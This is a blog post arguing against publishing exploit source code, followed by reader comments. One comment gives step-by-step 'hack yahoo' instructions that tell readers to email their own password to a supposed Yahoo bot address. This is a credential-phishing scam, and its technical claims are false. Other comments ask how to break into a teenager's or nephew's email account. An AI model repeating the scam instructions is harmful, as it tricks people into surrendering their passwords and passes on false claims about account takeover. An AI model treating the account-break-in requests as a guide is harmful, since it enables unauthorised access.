It amazes me how many bloggers and so-called “security experts” go around handing out loaded guns in the interest of promoting gun safety.
Source Code?
SOURCE CODE!?!
No one needs the source code of an XSS attack in order to protect themselves from XSS attack. Ditto for any other scripting or software-based attack. So what, exactly, is the point of posting code+instructions and saying, in no uncertain terms, “Here, go play with these hand grenades, and if you blow something up real good, send me a picture!”
Are you trying to educate the programmers about the holes in their code? Code is their life and livelihood… DESCRIBE the problem and they can write their own code without your help. Are you trying to prove that it can be done? Then DO it… post a screenshot of it being done instead of instructions/code on how to do it. Are you trying to entice a new generation of script-kiddies to perform attacks on the unsuspecting web-public by giving them live ammo to play with? Hmm…
I’m not one of those people who thinks information I don’t like should be hidden or restricted. But I don’t think information of this type should be actively disseminated, either. Should the information be available? Yeah… maybe… that’s debatable. Personally, I’m leaning toward “yes”. Somewhere. But being “out there somewhere” is a lot different than me painting it on a billboard in my front yard. Unless, of course, I have some ulterior motive (like: “I hate the MPAA so I’m going to post the AACS key” or “I hate Yahoo so I’m going to show the world how to screw them.”) If that’s the case, then I won’t do it under the guise of being concerned about security. If security awareness IS my main objective, then the last thing I’m going to do is hand out source code for exploits. That’s sort of like having sex to support virginity.

There is only one real way to hack yahoo without actually hacking the yahoo website.
send an e-mail from a yahoo account that it older than 10 days to pass_transfer_proto@yahoo.com . This adress was used for getting passwords when accounts were moved to different servers.
In the subject line type pass_transfer
In the main body of the message type;
/cgi-bin/start/v703&HACKED ACCOUNT&pswrdtransfer-serverbot9985a5&-YOUR PASSWORD-&-27568&java-&rsa.
replace HACKED ACCOUNT with the login name of the person you want to hack ( minus the @yahoo.com) and replace YOUR PASSWORD with your password.
This will tell the yahoo bot that the account has transfered servers and the accound will be re-registered and the password will be sent to the adress the e-mail origionated from.
So if you wanted to hack detahvaley77@yahoo.com and your password was nicthegreek it would look like this;
/cgi-bin/start/v703&deathvaley77&pswrdtransfer-serverbot9985a5&-nicthegreek-&-27568&java-&rsa.

I’m a 38 year old father of 2 and I’m afraid my 13 year old daughter is up to know good on her computer. I would like to find a way to get into her email to make sure everything’s cool. I am hoping so desperately that you can help me. I have a nephew who has had a lot of issues in his life. From his mom and dad being addicted to crack cocaine and his father beating him and now he is 16 and the last beating he got he was sent to the hospital and given a cat scan to make sure there was no interal bleeding in his head. So I have taken guardianship of him to try to help him. He is a drug user himself, a theif, a liar, and a manipulater but hes 16 and Im hoping with the right help we can make things better for him. Well Thursday evening I found syringes and a vile of a nactoric from a hospital….and then I found a letter opener and other things he had stolen. When he came home and found out that I knew he ran. And I have not heard from him since….I have done everything I can think of. I thought that maybe if I could get into his email acct it could give me more info or help to find where he is so hes safe.
